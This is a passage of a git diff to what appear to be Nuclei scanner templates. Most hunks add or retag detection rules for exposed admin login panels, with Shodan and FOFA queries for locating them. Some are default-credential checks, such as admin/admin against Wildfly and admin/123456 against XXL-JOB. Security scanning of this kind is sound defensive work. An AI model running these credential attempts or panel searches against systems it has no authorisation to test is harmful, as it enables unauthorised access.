-  name: Rainloop WebMail Default Login
+  name: Rainloop WebMail - Default Admin Login
   author: For3stCo1d
   severity: high
+  description: Rainloop WebMail default admin login credentials were successful.
   reference:
     - https://github.com/RainLoop/rainloop-webmail/issues/28
   metadata:
+    verified: true
     fofa-query: app="RAINLOOP-WebMail"
-  tags: rainloop,webmail,default-login,foss
+  tags: default-login,rainloop,webmail,foss
 
 requests:
   - raw:
@@ -50,4 +52,6 @@ requests:
 
       - type: status
         status:
-          - 200
\ No newline at end of file
+          - 200
+
+# Enhanced by mp on 2022/07/04
diff --git a/default-logins/seeddms/seeddms-default-login.yaml b/default-logins/seeddms/seeddms-default-login.yaml
index 9b37bf93bc..3ec3b79fbb 100644
--- a/default-logins/seeddms/seeddms-default-login.yaml
+++ b/default-logins/seeddms/seeddms-default-login.yaml
@@ -12,6 +12,8 @@ info:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
     cvss-score: 8.3
     cwe-id: CWE-522
+  metadata:
+    shodan-query: http.title:"SeedDMS"
   tags: default-login,seeddms
 
 requests:
diff --git a/default-logins/supermicro/supermicro-default-login.yaml b/default-logins/supermicro/supermicro-default-login.yaml
index 14c7e91cd3..96567eaaac 100644
--- a/default-logins/supermicro/supermicro-default-login.yaml
+++ b/default-logins/supermicro/supermicro-default-login.yaml
@@ -1,9 +1,10 @@
 id: supermicro-default-login
 
 info:
-  name: Supermicro Ipmi Default Login
+  name: Supermicro Ipmi - Default Admin Login
   author: For3stCo1d
   severity: high
+  description: Supermicro Ipmi default admin login credentials were successful.
   reference:
     - https://www.gearprimer.com/wiki/supermicro-ipmi-default-username-pasword/
   tags: supermicro,default-login
@@ -39,3 +40,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/04
diff --git a/default-logins/weblogic/weblogic-weak-login.yaml b/default-logins/weblogic/weblogic-weak-login.yaml
index 558792b844..942e5a6350 100644
--- a/default-logins/weblogic/weblogic-weak-login.yaml
+++ b/default-logins/weblogic/weblogic-weak-login.yaml
@@ -12,7 +12,7 @@ info:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
     cvss-score: 8.3
     cwe-id: CWE-522
-  tags: default-login,weblogic
+  tags: default-login,weblogic,vulhub
 
 requests:
   - raw:
diff --git a/default-logins/wildfly/wildfly-default-login.yaml b/default-logins/wildfly/wildfly-default-login.yaml
new file mode 100644
index 0000000000..bc21012112
--- /dev/null
+++ b/default-logins/wildfly/wildfly-default-login.yaml
@@ -0,0 +1,40 @@
+id: wildfly-default-login
+
+info:
+  name: Wildfly - Default Admin Login
+  author: s0obi
+  severity: high
+  description: |
+    Wildfly default admin login credentials were successful.
+  reference:
+    - https://docs.wildfly.org/26.1/#administrator-guides
+  tags: wildfly,default-login
+
+requests:
+  - raw:
+      - |
+        GET /management HTTP/1.1
+        Host: {{Hostname}}
+
+    digest-username: admin
+    digest-password: admin
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        part: body
+        words:
+          - "management-major-version"
+          - "product-version"
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "application/json"
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/07/04
diff --git a/default-logins/xxljob/xxljob-default-login.yaml b/default-logins/xxljob/xxljob-default-login.yaml
index 9cf9eadb12..23a8a8d22c 100644
--- a/default-logins/xxljob/xxljob-default-login.yaml
+++ b/default-logins/xxljob/xxljob-default-login.yaml
@@ -2,7 +2,7 @@ id: xxljob-default-login
 
 info:
   name: XXL-JOB Default Login
-  author: pdteam
+  author: pdteam,ritikchaddha
   severity: high
   description: XXL-JOB default admin credentials were discovered.
   reference:
@@ -11,6 +11,9 @@ info:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
     cvss-score: 8.3
     cwe-id: CWE-522
+  metadata:
+    verified: true
+    shodan-query: http.favicon.hash:1691956220
   tags: default-login,xxljob
 
 requests:
@@ -22,13 +25,21 @@ requests:
 
         userName={{username}}&password={{password}}
 
+      - |
+        POST /login HTTP/1.1
+        Host:{{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+        userName={{username}}&password={{password}}
+
+    attack: pitchfork
     payloads:
       username:
         - admin
       password:
         - 123456
-    attack: pitchfork
 
+    stop-at-first-match: true
     matchers-condition: and
     matchers:
       - type: word
@@ -39,10 +50,10 @@ requests:
         condition: and
 
       - type: word
+        part: header
         words:
           - 'application/json'
           - 'XXL_JOB_LOGIN_IDENTITY'
-        part: header
         condition: and
 
       - type: status
diff --git a/dns/cname-fingerprint.yaml b/dns/cname-fingerprint.yaml
index 7f03f7f68f..7220ee19ed 100644
--- a/dns/cname-fingerprint.yaml
+++ b/dns/cname-fingerprint.yaml
@@ -14,7 +14,7 @@ info:
 
 dns:
   - name: "{{FQDN}}"
-    type: NS
+    type: CNAME
 
     matchers:
       - type: word
diff --git a/dns/cname-service-detection.yaml b/dns/cname-service.yaml
similarity index 84%
rename from dns/cname-service-detection.yaml
rename to dns/cname-service.yaml
index 4a441a0b4d..0ba0b40edf 100644
--- a/dns/cname-service-detection.yaml
+++ b/dns/cname-service.yaml
@@ -1,4 +1,4 @@
-id: cname-service-detection
+id: cname-service
 
 info:
   name: CNAME Service Detection
@@ -37,4 +37,9 @@ dns:
         words:
           - "wixdns.net"
 
+      - type: word
+        name: salesforce-community
+        words:
+          - "live.siteforce.com"
+
 # Enhanced by mp on 2022/03/13
diff --git a/exposed-panels/3g-wireless-gateway.yaml b/exposed-panels/3g-wireless-gateway.yaml
index d8675d9ba9..234b7e4dad 100644
--- a/exposed-panels/3g-wireless-gateway.yaml
+++ b/exposed-panels/3g-wireless-gateway.yaml
@@ -9,7 +9,7 @@ info:
     - https://www.exploit-db.com/ghdb/7050
   classification:
     cwe-id: CWE-200
-  tags: panel,router
+  tags: panel,router,edb
 
 requests:
   - method: GET
diff --git a/technologies/achecker-detect.yaml b/exposed-panels/achecker-panel.yaml
similarity index 84%
rename from technologies/achecker-detect.yaml
rename to exposed-panels/achecker-panel.yaml
index dd940e3eeb..6c1734bde3 100644
--- a/technologies/achecker-detect.yaml
+++ b/exposed-panels/achecker-panel.yaml
@@ -1,10 +1,10 @@
-id: achecker-detect
+id: achecker-panel
 
 info:
-  name: AChecker Detect
+  name: AChecker Login Panel
   author: princechaddha
   severity: info
-  tags: tech,achecker
+  tags: panel,achecker
 
 requests:
   - method: GET
diff --git a/exposed-panels/acrolinx-dashboard.yaml b/exposed-panels/acrolinx-dashboard.yaml
index 8c3d55bd48..d77c074385 100644
--- a/exposed-panels/acrolinx-dashboard.yaml
+++ b/exposed-panels/acrolinx-dashboard.yaml
@@ -12,7 +12,7 @@ info:
   metadata:
     fofa-query: title=="Acrolinx Dashboard"
     shodan-query: http.title:"Acrolinx Dashboard"
-    google-dork: inurl:"Acrolinx Dashboard"
+    google-query: inurl:"Acrolinx Dashboard"
   tags: acrolinx,panel
 
 requests:
diff --git a/exposed-panels/adminer-panel.yaml b/exposed-panels/adminer-panel.yaml
index 0adab4e046..adf4b4c859 100644
--- a/exposed-panels/adminer-panel.yaml
+++ b/exposed-panels/adminer-panel.yaml
@@ -2,7 +2,7 @@ id: adminer-panel
 
 info:
   name: Adminer Login Panel
-  author: random_robbie,meme-lord
+  author: random_robbie,meme-lord,ritikchaddha
   severity: info
   description: An Adminer login panel was detected.
   reference:
@@ -10,6 +10,7 @@ info:
   classification:
     cwe-id: CWE-200
   metadata:
+    verified: true
     shodan-query: title:"Login - Adminer"
   tags: panel,adminer
 
@@ -23,6 +24,7 @@ requests:
       - '{{BaseURL}}/mysql.php'
       - '{{BaseURL}}/sql.php'
       - '{{BaseURL}}/wp-content/plugins/adminer/adminer.php'
+      - '{{BaseURL}}/admin.php'
 
     headers:
       Accept-Language: en-US,en;q=0.5
diff --git a/exposed-panels/adobe/adobe-component-login.yaml b/exposed-panels/adobe/adobe-component-login.yaml
index 1d46e94118..1ad431f88b 100644
--- a/exposed-panels/adobe/adobe-component-login.yaml
+++ b/exposed-panels/adobe/adobe-component-login.yaml
@@ -11,7 +11,7 @@ info:
     cwe-id: CWE-200
   metadata:
     shodan-query: http.component:"Adobe ColdFusion"
-  tags: panel,adobe,coldfusion
+  tags: panel,adobe,coldfusion,edb
 
 requests:
   - method: GET
diff --git a/exposed-panels/adobe/adobe-experience-manager-login.yaml b/exposed-panels/adobe/adobe-experience-manager-login.yaml
index c1a0f41886..9148cd29f0 100644
--- a/exposed-panels/adobe/adobe-experience-manager-login.yaml
+++ b/exposed-panels/adobe/adobe-experience-manager-login.yaml
@@ -6,10 +6,11 @@ info:
   severity: info
   description: An Adobe Experience Manager login panel was detected.
   reference:
-    - https://www.shodan.io/search?query=http.title%3A%22AEM+Sign+In%22
     - https://business.adobe.com/products/experience-manager/adobe-experience-manager.html
   classification:
     cwe-id: CWE-200
+  metadata:
+    shodan-query: http.title:"AEM Sign In"
   tags: panel,aem,adobe
 
 requests:
diff --git a/exposed-panels/adobe/adobe-media-server.yaml b/exposed-panels/adobe/adobe-media-server.yaml
index 2ee6efc2c8..45e3d0b4a9 100644
--- a/exposed-panels/adobe/adobe-media-server.yaml
+++ b/exposed-panels/adobe/adobe-media-server.yaml
@@ -6,10 +6,11 @@ info:
   severity: info
   description: An Adobe Media Server login panel was detected.
   reference:
-    - https://www.shodan.io/search?query=http.title%3A%22Adobe+Media+Server%22
     - https://helpx.adobe.com/support/adobe-media-server.html
   classification:
     cwe-id: CWE-200
+  metadata:
+    shodan-query: http.title:"Adobe Media Server"
   tags: panel,adobe
 
 requests:
diff --git a/exposed-panels/adobe/aem-crx-package-manager.yaml b/exposed-panels/adobe/aem-crx-package-manager.yaml
new file mode 100644
index 0000000000..7f7bc5429e
--- /dev/null
+++ b/exposed-panels/adobe/aem-crx-package-manager.yaml
@@ -0,0 +1,33 @@
+id: aem-crx-package-manager
+
+info:
+  name: Adobe AEM CRX Package Manager Exposure
+  author: dhiyaneshDk
+  severity: info
+  reference:
+    - https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/aem2.txt
+  metadata:
+    shodan-query:
+      - http.title:"AEM Sign In"
+      - http.component:"Adobe Experience Manager"
+  tags: panel,aem,adobe
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/crx/packmgr/index.jsp"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '<title>CRX Package Manager</title>'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/adobe/aem-sling-login.yaml b/exposed-panels/adobe/aem-sling-login.yaml
new file mode 100644
index 0000000000..22eab59499
--- /dev/null
+++ b/exposed-panels/adobe/aem-sling-login.yaml
@@ -0,0 +1,36 @@
+id: aem-sling-login
+
+info:
+  name: AEM Sling Login
+  author: dhiyaneshDk
+  severity: info
+  reference:
+    - https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/aem2.txt
+  metadata:
+    shodan-query:
+      - http.title:"AEM Sign In"
+      - http.component:"Adobe Experience Manager"
+  tags: panel,aem,adobe,sling
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/system/sling/cqform/defaultlogin.html"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '<title>Login</title>'
+          - 'j_username'
+          - 'j_password'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/advance-setup.yaml b/exposed-panels/advance-setup.yaml
index bbee2bbcf7..6a9647f0a6 100644
--- a/exposed-panels/advance-setup.yaml
+++ b/exposed-panels/advance-setup.yaml
@@ -10,7 +10,7 @@ info:
     - https://www.actiontec.com/dsl/
   classification:
     cwe-id: CWE-200
-  tags: panel,setup
+  tags: panel,setup,edb
 
 requests:
   - method: GET
diff --git a/exposed-panels/airflow-panel.yaml b/exposed-panels/airflow-panel.yaml
index 1df0b6c38b..b26647d5a5 100644
--- a/exposed-panels/airflow-panel.yaml
+++ b/exposed-panels/airflow-panel.yaml
@@ -8,9 +8,8 @@ info:
   reference:
     - https://airflow.apache.org/docs/apache-airflow/stable/security/webserver.html
   classification:
-    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
-    cvss-score: 8.3
-    cwe-id: CWE-522
+    cvss-score: 0.0
+    cwe-id: CWE-668
   metadata:
     shodan-query: title:"Sign In - Airflow"
   tags: panel,apache,airflow,admin
diff --git a/exposed-panels/ambari-exposure.yaml b/exposed-panels/ambari-exposure.yaml
index a420d84dba..98dfcf442c 100644
--- a/exposed-panels/ambari-exposure.yaml
+++ b/exposed-panels/ambari-exposure.yaml
@@ -3,12 +3,11 @@ id: ambari-exposure
 info:
   name: Apache Ambari Exposure Admin Login Panel
   author: pdteam
-  severity: medium
+  severity: info
   description: An Apache Ambari panel was discovered.
   classification:
-    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
-    cvss-score: 5.3
-    cwe-id: CWE-200
+    cvss-score: 0.0
+    cwe-id: CWE-668
   tags: panel,apache,ambari,exposure
 
 requests:
diff --git a/exposed-panels/amcrest-login.yaml b/exposed-panels/amcrest-login.yaml
index 1c2714211b..780e4e1b0d 100644
--- a/exposed-panels/amcrest-login.yaml
+++ b/exposed-panels/amcrest-login.yaml
@@ -11,8 +11,8 @@ info:
     cwe-id: CWE-200
   metadata:
     shodan-query: html:"amcrest"
-    google-dork: intext:"amcrest" "LDAP User"
-  tags: panel,camera,amcrest
+    google-query: intext:"amcrest" "LDAP User"
+  tags: panel,camera,amcrest,edb
 
 requests:
   - method: GET
diff --git a/exposed-panels/amp-application-panel.yaml b/exposed-panels/amp-application-panel.yaml
new file mode 100644
index 0000000000..4b4c78f061
--- /dev/null
+++ b/exposed-panels/amp-application-panel.yaml
@@ -0,0 +1,27 @@
+id: amp-application-panel
+
+info:
+  name: AMP - Application Management Panel
+  author: DhiyaneshDK
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: title:"AMP - Application Management Panel"
+  tags: panel,amp
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        words:
+          - "<title>AMP - Application Management Panel</title>"
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
diff --git a/exposed-panels/apache/public-tomcat-manager.yaml b/exposed-panels/apache/public-tomcat-manager.yaml
index fea6aabea5..ee96281c8b 100644
--- a/exposed-panels/apache/public-tomcat-manager.yaml
+++ b/exposed-panels/apache/public-tomcat-manager.yaml
@@ -7,6 +7,8 @@ info:
   description: An Apache Tomcat Manager panel was discovered.
   classification:
     cwe-id: CWE-200
+  metadata:
+    shodan-query: title:"Apache Tomcat"
   tags: panel,tomcat,apache
 
 requests:
diff --git a/exposed-panels/appsmith-web-login.yaml b/exposed-panels/appsmith-web-login.yaml
new file mode 100644
index 0000000000..01c88aade3
--- /dev/null
+++ b/exposed-panels/appsmith-web-login.yaml
@@ -0,0 +1,29 @@
+id: appsmith-web-login
+
+info:
+  name: Appsmith Web Log In Panel
+  author: powerexploit
+  severity: info
+  description: Appsmith is a low code, open-source developer tool to build internal applications quickly. You can drag and drop pre-built widgets to build UI on a grid-style canvas.
+  reference:
+    - https://www.appsmith.com
+  metadata:
+    verified: true
+    shodan-query: http.title:"appsmith"
+  tags: panel,appsmith
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/user/login"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<title>Appsmith</title>"
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/aqua-enterprise-panel.yaml b/exposed-panels/aqua-enterprise-panel.yaml
new file mode 100644
index 0000000000..8bf7f2b692
--- /dev/null
+++ b/exposed-panels/aqua-enterprise-panel.yaml
@@ -0,0 +1,33 @@
+id: aqua-enterprise-panel
+
+info:
+  name: Aqua Enterprise Panel
+  author: idealphase
+  severity: info
+  description: |
+    Aqua scans container images based on a constantly updated stream of aggregate sources of vulnerability data (CVEs, vendor advisories, and proprietary research)
+  reference:
+    - https://www.aquasec.com/
+  metadata:
+    verified: true
+    shodan-query: http.title:"Aqua Enterprise" || http.title:"Aqua Cloud Native Security Platform"
+    google-query: intitle:"Aqua Cloud Native Security Platform"
+  tags: panel,aqua,aquasec
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<title>Aqua Enterprise</title>"
+          - "<title>Aqua Cloud Native Security Platform</title>"
+        condition: or
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/archibus-webcentral-panel.yaml b/exposed-panels/archibus-webcentral-panel.yaml
new file mode 100644
index 0000000000..aef27bcd62
--- /dev/null
+++ b/exposed-panels/archibus-webcentral-panel.yaml
@@ -0,0 +1,38 @@
+id: archibus-webcentral-panel
+
+info:
+  name: Archibus Web Central Panel
+  author: righettod,PJBorah,Hardik-Rathod
+  severity: info
+  reference:
+    - https://archibus.com/products/
+  metadata:
+    verified: true
+    shodan-query: http.favicon.hash:889652940
+  tags: panel,archibus
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+      - '{{BaseURL}}/archibus/login.axvw'
+      - '{{BaseURL}}/archibus/schema/ab-core/views/sign-in/ab-sign-in.jsp'
+
+    redirects: true
+    max-redirects: 2
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "ARCHIBUS"
+
+      - type: word
+        words:
+          - "Continue As a Guest"
+          - "login"
+        condition: or
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/atvise-login.yaml b/exposed-panels/atvise-login.yaml
index bc58bf1715..360d06ce3b 100644
--- a/exposed-panels/atvise-login.yaml
+++ b/exposed-panels/atvise-login.yaml
@@ -11,8 +11,8 @@ info:
   classification:
     cwe-id: CWE-200
   metadata:
-    google-dork: intitle:"atvise - next generation"
-  tags: panel,atvise
+    google-query: intitle:"atvise - next generation"
+  tags: panel,atvise,edb
 
 requests:
   - method: GET
diff --git a/exposed-panels/audiocodes-detect.yaml b/exposed-panels/audiocodes-detect.yaml
new file mode 100644
index 0000000000..896b2ea28b
--- /dev/null
+++ b/exposed-panels/audiocodes-detect.yaml
@@ -0,0 +1,29 @@
+id: audiocodes-detect
+
+info:
+  name: AudioCodes Login Panel
+  author: princechaddha
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.html:"Audiocodes"
+  tags: panel,audiocodes
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        part: body
+        words:
+          - "AudioCodes"
+          - "login"
+        condition: and
+
+      - type: status
+        status:
+          - 203
diff --git a/exposed-panels/avantfax-panel.yaml b/exposed-panels/avantfax-panel.yaml
index 7694287813..7a968e7b6a 100644
--- a/exposed-panels/avantfax-panel.yaml
+++ b/exposed-panels/avantfax-panel.yaml
@@ -8,9 +8,8 @@ info:
   reference:
     - http://www.avantfax.com/
   classification:
-    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
-    cvss-score: 5.3
-    cwe-id: CWE-200
+    cvss-score: 0.0
+    cwe-id: CWE-668
   metadata:
     shodan-query: http.title:"AvantFAX - Login"
   tags: panel,avantfax,login
diff --git a/exposed-panels/avatier-password-management.yaml b/exposed-panels/avatier-password-management.yaml
index 49cd4c37ae..5f4d310a3f 100644
--- a/exposed-panels/avatier-password-management.yaml
+++ b/exposed-panels/avatier-password-management.yaml
@@ -12,7 +12,7 @@ info:
     cwe-id: CWE-200
   metadata:
     shodan-query: http.favicon.hash:983734701
-  tags: panel,avatier,aims
+  tags: edb,panel,avatier,aims
 
 requests:
   - method: GET
diff --git a/exposed-panels/avideo-install.yaml b/exposed-panels/avideo-install.yaml
new file mode 100644
index 0000000000..eab8a8a4f6
--- /dev/null
+++ b/exposed-panels/avideo-install.yaml
@@ -0,0 +1,27 @@
+id: avideo-install
+
+info:
+  name: Avideo Installation Setup
+  author: ritikchaddha
+  severity: high
+  metadata:
+    verified: true
+    shodan-query: http.title:"AVideo"
+    fofa-query: "AVideo"
+  tags: panel,install,avideo
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/install/index.php"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>Install AVideo</title>'
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/avtech-avn801-camera-panel.yaml b/exposed-panels/avtech-avn801-camera-panel.yaml
index 6c233d50a7..a36f8957c2 100644
--- a/exposed-panels/avtech-avn801-camera-panel.yaml
+++ b/exposed-panels/avtech-avn801-camera-panel.yaml
@@ -1,10 +1,10 @@
 id: avtech-avn801-camera-panel
 
 info:
-  name: Avtech AVN801 Network Camera Panel Detect
+  name: Avtech AVN801 Network Camera - Admin Panel Detection
   author: idealphase
   severity: info
-  description: AVTECH offers a range of IP camera series with different shapes, resolutions and lens to fulfill different demands. Select the items needed to narrow down product search.
+  description: An Avtech AVN801 Network Camera administration panel was detected.
   reference:
     - http://www.avtech.com.tw
   metadata:
@@ -28,3 +28,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/22
diff --git a/exposed-panels/azkaban-web-client.yaml b/exposed-panels/azkaban-web-client.yaml
index a6a08b2122..c939d27836 100644
--- a/exposed-panels/azkaban-web-client.yaml
+++ b/exposed-panels/azkaban-web-client.yaml
@@ -7,9 +7,10 @@ info:
   description: An Azkaban web client panel was discovered.
   reference:
     - https://azkaban.github.io/
-    - https://www.shodan.io/search?query=http.title%3A%22Azkaban+Web+Client%22
   classification:
     cwe-id: CWE-200
+  metadata:
+    shodan-query: http.title:"Azkaban Web Client"
   tags: panel,azkaban
 
 requests:
diff --git a/exposed-panels/beyondtrust-login-server.yaml b/exposed-panels/beyondtrust-login-server.yaml
index 3ac61f0d06..43746ede00 100644
--- a/exposed-panels/beyondtrust-login-server.yaml
+++ b/exposed-panels/beyondtrust-login-server.yaml
@@ -1,31 +1,31 @@
-id: beyondtrust-login-server
+id: beyondtrust-login-server
 
-info:
-  name: BeyondTrust PAM login Server
-  author: r3dg33k,nuk3s3c
-  severity: info
-  tags: beyondtrust,pam,panel
+info:
+  name: BeyondTrust PAM login Server
+  author: r3dg33k,nuk3s3c
+  severity: info
+  tags: beyondtrust,pam,panel
 
-requests:
-  - method: GET
-    path:
-      - '{{BaseURL}}/WebConsole/api/security/auth/loginServers'
-
-    matchers-condition: and
-    matchers:
-      - type: status
-        status:
-          - 200
-
-      - type: regex
-        regex:
-          - '"DomainName":"(.*)"'
-          - '"domains":'
-        condition: and
-
-    extractors:
-      - type: json
-        part: body
-        json:
-          - ".domains[] | .DomainName"
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/WebConsole/api/security/auth/loginServers'
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: regex
+        regex:
+          - '"DomainName":"(.*)"'
+          - '"domains":'
+        condition: and
+
+    extractors:
+      - type: json
+        part: body
+        json:
+          - ".domains[] | .DomainName"
           - ".domains[] | .ldapservers"
\ No newline at end of file
diff --git a/exposed-panels/beyondtrust-panel.yaml b/exposed-panels/beyondtrust-panel.yaml
index 06a08998fd..5f024e105e 100644
--- a/exposed-panels/beyondtrust-panel.yaml
+++ b/exposed-panels/beyondtrust-panel.yaml
@@ -1,21 +1,21 @@
-id: beyondtrust-panel
+id: beyondtrust-panel
 
-info:
-  name: BeyondTrust Login Panel
-  author: r3dg33k,nuk3s3c
-  severity: info
-  description: Detects default Login page for Beyond Trust PAM solution
-  metadata:
-    shodan-query: http.html:"BeyondInsight"
-  tags: beyondtrust,pam,panel
+info:
+  name: BeyondTrust Login Panel
+  author: r3dg33k,nuk3s3c
+  severity: info
+  description: Detects default Login page for Beyond Trust PAM solution
+  metadata:
+    shodan-query: http.html:"BeyondInsight"
+  tags: beyondtrust,pam,panel
 
-requests:
-  - method: GET
-    path:
-      - '{{BaseURL}}/WebConsole/'
-
-    matchers:
-      - type: word
-        part: body
-        words:
-          - "<title>BeyondInsight</title>"
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/WebConsole/'
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<title>BeyondInsight</title>"
diff --git a/exposed-panels/black-duck-panel.yaml b/exposed-panels/black-duck-panel.yaml
new file mode 100644
index 0000000000..8e3d84eaf3
--- /dev/null
+++ b/exposed-panels/black-duck-panel.yaml
@@ -0,0 +1,41 @@
+id: black-duck-panel
+
+info:
+  name: Black Duck Panel
+  author: idealphase,ritikchaddha
+  severity: info
+  description: |
+    Black Duck Security Advisories help you avoid being caught off-guard by open source vulnerabilities, both in development and production. And they provide the critical data necessary to prioritize vulnerabilities for remediation, such as exploit info, remediation guidance, severity scoring, and call path analysis.
+  reference:
+    - https://www.blackducksoftware.com/
+    - https://www.synopsys.com/software-integrity/security-testing/software-composition-analysis.html
+  metadata:
+    verified: true
+    shodan-query: http.title:"Black Duck"
+  tags: panel,blackduck,synopsys
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        part: body
+        regex:
+          - '(?m)<title>Black Duck(.*)<\/title>'
+
+      - type: word
+        part: body
+        words:
+          - 'ProtexLoginPage'
+          - 'CCLoginPage'
+        condition: or
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/blue-iris-login.yaml b/exposed-panels/blue-iris-login.yaml
index 783f3c0527..1b77942efa 100644
--- a/exposed-panels/blue-iris-login.yaml
+++ b/exposed-panels/blue-iris-login.yaml
@@ -12,7 +12,7 @@ info:
     cwe-id: CWE-200
   metadata:
     shodan-query: http.title:"Blue Iris Login"
-  tags: panel,blueiris
+  tags: panel,blueiris,edb
 
 requests:
   - method: GET
diff --git a/exposed-panels/ccm-detect.yaml b/exposed-panels/ccm-detect.yaml
new file mode 100644
index 0000000000..54db919a16
--- /dev/null
+++ b/exposed-panels/ccm-detect.yaml
@@ -0,0 +1,27 @@
+id: ccm-detect
+info:
+  name: ClearCom Core Configuration Manager (CCM) Detect
+  author: failOpen
+  severity: info
+  reference:
+    - https://www.clearcom.com/DownloadCenter/manuals/FreeSpeakII_Online_Manual/UserGuide/Content/Base/CCM/CCM.htm
+  metadata:
+    verified: true
+    shodan-query: http.html:"CCM - Authentication Failure"
+  tags: panel,clearcom,ccm
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "CCM - Authentication Failure"
+
+      - type: status
+        status:
+          - 401
diff --git a/exposed-panels/circarlife-setup.yaml b/exposed-panels/circarlife-setup.yaml
index 7f06746f27..95c35c7395 100644
--- a/exposed-panels/circarlife-setup.yaml
+++ b/exposed-panels/circarlife-setup.yaml
@@ -1,12 +1,16 @@
 id: circarlife-setup
 
 info:
-  name: Exposed CirCarLife Setup Page
+  name: CirCarLife - Admin Panel Access
   author: geeknik
   severity: critical
-  description: CirCarLife is an internet-connected electric vehicle charging station
+  description: A CirCarLife admin panel was accessed. CirCarLife is an internet-connected electric vehicle charging station
   reference:
     - https://circontrol.com/
+  classification:
+    cvss-metrics: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cwe-id: CWE-288
   tags: scada,circontrol,circarlife,setup,exposure,panel
 
 requests:
@@ -29,3 +33,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/05/23
diff --git a/exposed-panels/cisco/cisco-finesse-login.yaml b/exposed-panels/cisco/cisco-finesse-login.yaml
index ad8938564b..53eec5a454 100644
--- a/exposed-panels/cisco/cisco-finesse-login.yaml
+++ b/exposed-panels/cisco/cisco-finesse-login.yaml
@@ -6,7 +6,7 @@ info:
   severity: info
   reference:
     - https://www.exploit-db.com/ghdb/6824
-  tags: panel,cisco
+  tags: panel,cisco,edb
 
 requests:
   - method: GET
diff --git a/exposed-panels/cisco/cisco-integrated-login.yaml b/exposed-panels/cisco/cisco-integrated-login.yaml
index 5f716a0018..ea59a7b5eb 100644
--- a/exposed-panels/cisco/cisco-integrated-login.yaml
+++ b/exposed-panels/cisco/cisco-integrated-login.yaml
@@ -6,7 +6,7 @@ info:
   severity: info
   reference:
     - https://www.exploit-db.com/ghdb/3859
-  tags: panel,cisco
+  tags: panel,cisco,edb
 
 requests:
   - method: GET
diff --git a/exposed-panels/cisco/cisco-meraki-exposure.yaml b/exposed-panels/cisco/cisco-meraki-exposure.yaml
index d14835d3a6..2bd4804920 100644
--- a/exposed-panels/cisco/cisco-meraki-exposure.yaml
+++ b/exposed-panels/cisco/cisco-meraki-exposure.yaml
@@ -6,7 +6,7 @@ info:
   severity: info
   reference:
     - https://www.exploit-db.com/ghdb/6708
-  tags: panel,cisco,meraki,disclosure
+  tags: panel,cisco,meraki,disclosure,edb
 
 requests:
   - method: GET
diff --git a/exposed-panels/cisco/cisco-sendgrid.yaml b/exposed-panels/cisco/cisco-sendgrid.yaml
index 7148f305d0..beabbae9a8 100644
--- a/exposed-panels/cisco/cisco-sendgrid.yaml
+++ b/exposed-panels/cisco/cisco-sendgrid.yaml
@@ -4,8 +4,8 @@ info:
   name: Cisco ServiceGrid
   author: dhiyaneshDK
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22Cisco+ServiceGrid%22
